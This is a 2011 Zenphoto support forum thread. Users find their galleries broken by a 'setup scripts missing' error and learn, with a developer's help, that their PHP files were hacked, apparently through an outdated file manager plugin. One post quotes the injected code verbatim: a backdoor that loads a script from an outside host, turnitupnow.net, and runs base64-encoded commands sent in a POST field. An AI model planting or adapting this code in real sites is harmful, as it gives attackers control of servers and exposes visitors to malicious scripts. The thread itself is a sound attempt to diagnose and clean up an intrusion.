zenphoto forums » Installation Support

[closed]

setup scripts missing

(55 posts)

Tags:

  1. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Hi,

    My Zen Installation has been working fine and then out of the blue when I went to view it today I got this.

    "setup scripts missing"

    It happens both with I try to access the Admin and the Live Gallery.

    http://spoilertv.co.uk/images/zp-core/admin.php
    http://spoilertv.co.uk/images/

    As far as I know we've made no changes for a couple of weeks.

    Any pointers/help would be great/

    Posted 2 years ago #
  2. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    You probably upgraded or something. Just re-upload the files complained about and let setup re-run.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  3. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    That's the thing. It was working fine when I went to bed last night and we've not made any changes. When I got up this morning the error occured.

    How do I see which files are missing?

    This is what I see in the log.

    I've no idea what any of this means

    According to my investigation the index.php file has been modified a few hours later:
    -rw-r--r-- 1 spoilert spoilert 7859 Nov 9 00:41 /home/spoilert/public_html/images/index.php
    And the following is displayed in the error_log:
    [09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
    [09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729

    Posted 2 years ago #
  4. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    That's the thing. It was working fine when I went to bed last night and we've not made any changes. When I got up this morning the error occured.

    How do I see which files are missing?

    This is what I see in the log.

    I've no idea what any of this means

    According to my investigation the index.php file has been modified a few hours later:
    -rw-r--r-- 1 spoilert spoilert 7859 Nov 9 00:41 /home/spoilert/public_html/images/index.php
    And the following is displayed in the error_log:
    [09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
    [09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729

    Posted 2 years ago #
  5. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    That's the thing. It was working fine when I went to bed last night and we've not made any changes. When I got up this morning the error occured.

    How do I see which files are missing?

    Posted 2 years ago #
  6. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    I'm seeing this in my error log

    http://pastebin.com/XTdb6aBc

    I don't know what any of that means :(

    Posted 2 years ago #
  7. ajkphoto

    Member
    Joined: Aug '11
    Posts: 21

    I just came here to ask about this also. My site was working fine and I have made no changes before this happened. Just visited the site today to be confronted by the "setup scripts missing" message.

    In my error log I see:

    Cannot modify header information - headers already sent by (output started at /home/**************/index.php:1) in /home/***************/zp-core/functions.php on line 1729

    I can't view or login to the site.

    Any ideas before I re-upload?

    Thanks.

    Posted 2 years ago #
  8. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    We had this topic several times recently, please try the search, too.

    So again: After every install or upgrade you are requested to delete the setup files, /zp-core/setup.php and /zp-core/setup (folder) for security reasons. With 1.4.2 it will even do this automatically. This is what you probably did. Setup always runs automacitally if the version changes. That happes for example if you upgrade (from nightly builds for example) or remove the htaccess file.

    As said reupload the files and let setup run.

    Addition: If you think your root index.php file has been modified and should not make sure your site/Server has not been hacked. We have currently a topic about that: http://www.zenphoto.org/support/topic.php?id=9939#post-58237

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  9. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Acrylian,

    You're missing the point.

    This was an Install that had not been changed for several weeks.

    Literally overnight this problem occurred.

    I've had to re-install Zen to get it to work this morning.

    What I am worried about is why this happened with NO Modifications on my part whilst I was actually asleep.

    Does Zen Autoupdate itself with no user interaction?

    Looking at my index, album and image php files I see this code added to the top of each file.

    --

    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

    --

    What is this?

    Posted 2 years ago #
  10. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    No, Zenphoto does not and can't auto update.

    The code you posted proofs that apparently your site has been hacked. This might not have been Zenphoto fault, but a permissions issue. Best contact your host as well

    However as the thread I linked above tell there was a security issue with the 3rd party file manager in 1.4.1.4 and older. Maybe they exploited that or not.

    So I urge you to upgrade your site.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  11. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Thanks, I missed your update.

    Looks like it must have been hacked.

    I'm now on 1.4.1.5. Is that one secure?

    Posted 2 years ago #
  12. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    As far as we know it is secure. But of course there is sadly never a 100% guarantee until someone proofs otherwise.

    Please contact your host as well as it might not have been Zenphoto's fault at all.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  13. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Looking at the hack, all the php files in the zen folder had been hacked.

    Do you have any idea what that code above does/did?

    I'm now worried about using zen again after this

    Posted 2 years ago #
  14. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    Well, as said it must not have been Zenphoto's fault. For example our Zenphoto install on our site had not been hacked. Best contact your host, maybe he knows more.

    There are several possibilities Zenphoto cannot do anything about for example:
    - The file/folder permissions were not correct (what setting did you have?)
    - The server itself has been hacked

    Also your browser or computer system could have been infected and someone got the ftp password that way.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  15. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    We've check the server and only the Zen folder had the code added to every php file.

    All other php outside of zen are find.

    Also I checked with the hosts and no Admin access with FTP or other was done since my last authorized upload yesterday. The files seem to have been updated via some SQL Injection (whatever that is).

    Looks like something in zen 1.4.1.4 and below was insecure and hackers found a way in :(

    Posted 2 years ago #
  16. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    Well, if someone got access to the files it might have been a permissions issue as well. It might have been the file manager issue but we currently don't know.
    Did you look at the zp-data folder? If permissions are not correct on that the config file might have been hacked (note setup tries to set the permissions but cannot do so always depending on server config.)

    Which version was the original one on that site? Was that 1.4.1.4 or older?

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  17. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    1.4.1.4 was on the server.

    I've upgraded now to 1.4.1.5

    Permissions were all set correctly. It was a standard vanilla install.

    Looking at the code that was injected into all php files it seems related to a bot attack via the tinymce

    Posted 2 years ago #
  18. ajkphoto

    Member
    Joined: Aug '11
    Posts: 21

    I see the same code and in the same places that darkufo sees.

    I'm careful with my sites and have not experienced something like this before.

    I don't know if the theme has anything to do with it but I'm using zpgallerific_v1.4.1.

    Posted 2 years ago #
  19. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Sorry you also got hacked.

    I re-installed the whole of Zenphoto to remove the hacked code.

    Do you have other services on your server? You might want to check the php files of those services to see if they were hacked as well

    Posted 2 years ago #
  20. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Is it safe to delete the tinymce folder?

    Posted 2 years ago #
  21. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    If it got in via tinymce it might have been the ajax file manager security hole as that is also used as a tinymce plugin. It would help if you have some proof how and where they got in. I have not seen that yet. If it was not the file manager the tinymce developers might also be interessted in that (note 1.4.1.5 does not use the latest, the 1.4.2 beta does).

    As said on another thread several security sites had posted (and copied from each other as usual) this security site so maybe someone exploited that since naturally many people don't upgrade regulary.

    Of course you can remove tinymce, it is just a plugin you should disable before doing so. You will then of course loose the texteditor and have to add everything manually via plain html code.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  22. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Thanks, I'm working with my provider to get to the bottom of it.

    I've deleted tinymce (didn't use it anyway :) )

    I'll keep an eye on the server to make sure we don't get hit again.

    Posted 2 years ago #
  23. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    For albums and images TinyMCE is not necessary if you or your users are confident using html. For the lazy ones..;-) But for articles and pages it provides some convenient tools (tinyZenpage to include images for example).

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  24. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Cool. Yep, we only use it for images :)

    Posted 2 years ago #
  25. ajkphoto

    Member
    Joined: Aug '11
    Posts: 21

    Thanks darkufo, luckily this is actually a site I manage for an organisation and I don't have any of my own sites on that host.

    When I reinstalled this site and brought up to date with 1.4.1.5 zenphoto found the following files which it suggested I remove but I don't know whether that's normal:

    zp-core/tmp_2087833521026081.php
    zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php
    zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/error_log
    zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/tmpphp.php
    zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/index.php
    zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php
    zp-core/error_log

    Posted 2 years ago #
  26. darkufo

    Contributor
    Joined: Mar '11
    Posts: 127

    Thanks, I've removed all the TINYMCE ones already.

    Posted 2 years ago #
  27. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    @ajkphoto:
    All files are correct except:
    - "zp-core/tmp_2087833521026081.php" one, which is not generated by Zenphoto, might be a from your server.
    - "zp-core/error_log" Don't know what that is, might be genrated by your server. Zenphoto stores its log with a suffix .txt within zp-data.
    - "zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/tmpphp.php" - is actually not a file that should be there.

    Setup probably complains about the other because of the time stamp and "suggest" they might not be okay. It is not file compare.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #
  28. ajkphoto

    Member
    Joined: Aug '11
    Posts: 21

    Yeah I know I just posted that for reference if anyone else experiences this.

    Presumably with comments now disabled and me the only one accessing the site the TINYMCE issue shouldn't be a problem if I keep it enabled for my convenience.

    Posted 2 years ago #
  29. ajkphoto

    Member
    Joined: Aug '11
    Posts: 21

    I just noticed that if I visit http://www.gjr-web.com/ where the zpgallerific theme comes from it's also down with the "setup scripts missing" message being displayed. Is this a coincidence?

    Posted 2 years ago #
  30. Zenphoto development team
    acrylian

    Developer
    Joined: Jul '07
    Posts: 14,746

    gjr surely will tell us soon.

    Don't forget to read the Forum rules and usage resources
    Posted 2 years ago #

RSS feed for this topic

Topic Closed

This topic has been closed to new replies.